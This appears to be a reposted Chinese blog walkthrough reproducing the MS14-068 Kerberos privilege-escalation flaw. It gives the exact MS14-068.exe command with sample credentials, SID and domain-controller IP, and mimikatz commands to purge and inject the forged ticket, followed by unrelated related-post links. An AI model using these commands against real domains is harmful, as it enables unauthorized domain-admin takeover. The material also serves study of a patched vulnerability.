域渗透之MS14-068域提权漏洞

域渗透之MS14-68域提权漏洞漏洞概述漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。利用条件域控机器没有打MS14-068的补丁(KB3011780)需要一个域内用

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

域渗透之MS14-68域提权漏洞

漏洞概述

漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。

利用条件

域控机器没有打MS14-068的补丁(KB3011780)

需要一个域内用户和域内用户密码或hash,域内用户的suid

漏洞原理

服务票据是客户端直接发送给服务器,并请求服务资源的。如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器

MS14-068漏洞分析:Kerberos协议探索系列之票据篇

Kerberos认证原理

漏洞复现

Ms14-068利用工具

查询域控机器是否存在该补丁

systeminfo |find "3011780"
C:\Users\douser\Desktop>dir \\192.168.183.130\c$
拒绝访问。

使用普通用户权限,测试访问域控的C盘共享,访问被拒绝

MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr>
MS14-068.exe -u douser@demo -s S-1-5-21-979886063-111190
0045-1414766810-1107 -d 192.168.183.130 -p Dotest123

这里获取到一个TGT_douser@demo.com.ccache文件

清空票据

kerberos::purge //清空已有票据

kerberos::list  //查看票据

注入票据

kerberos::ptc TGT_douser@demo.com.ccache

域渗透之MS14-068域提权漏洞

mimikatz 不支持03系统注入

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119830.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 算法 – 判断一个数是不是2的n次幂「建议收藏」

    算法 – 判断一个数是不是2的n次幂「建议收藏」分享一个大牛的人工智能教程。零基础!通俗易懂!风趣幽默!希望你也加入到人工智能的队伍中来!请点击http://www.captainbed.net设要判断的数是无符号整数X。首先判断X是否为0,如果为0则不是2的n次幂,返回。将X和X-1进行按位“与”操作,如果结果是0,则说明这个数是2的n次幂;如果结果非0,则说明这个数不是2的n次幂。…

    2025年8月21日
    5
  • Android面试题:Retrofit「建议收藏」

    目录源码:相关视频:相关文章:一、简介:二、Retrofit常用参数注解:三、Retrofit使用:源码:square/retrofit相关视频:Retrofit网络库相关文章:Android优雅的让RxJava2.0+Retrofit2.0结合使用手写Rxjava+Retrofit+Mvp这是一份很详细的Retrofit2.0使用教…

    2022年4月13日
    40
  • 线性代数学习笔记——第二十五讲——向量在轴上的投影

    1.空间两向量的夹角(介于0到π之间,包括0和π)2.空间一点在轴或平面上的投影3.向量在轴上的投影4.用分量表示的向量,其分量即为向量在轴上的投影,向量的模可用分量表示5.向量在轴上的投影可用向量的模和向量与轴的夹角的表示…

    2022年4月4日
    119
  • javacloneable接口_comparable

    javacloneable接口_comparable特点一个类实现了Cloneable接口指向@linkjava.lang.Object#clone()}方法是合法的使得一个field-for-fieldcopy的类的实例的拷贝在不实现Cloneable接口的对象上调用Object的clone方法会导致CloneNotSupportedException异常抛出。按照约定,实现此接口的类应当重写Object.clo…

    2022年10月15日
    3
  • 【rman,1】经典案例增量备份

    【rman,1】经典案例增量备份

    2022年1月2日
    42
  • 哪些软件是python编写出来的_用Python编程需要什么软件?

    哪些软件是python编写出来的_用Python编程需要什么软件?用Python编程需要什么软件?Python编程是一门适合新手入门的编程语言,现在有不少程序员业余时间学习Python编程语言,学习Python找到好工具会大大提高学习的效率。好用的Python编程软件能将工作效率多倍速提升。今天小编就介绍一些Python编程软件供大家参考:一、终端:UptermUpterm简单好用,它是一个全平台的终端,可以说是终端里的IDE,有着强大的自动补全功能。二、交互式…

    2022年5月23日
    72

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号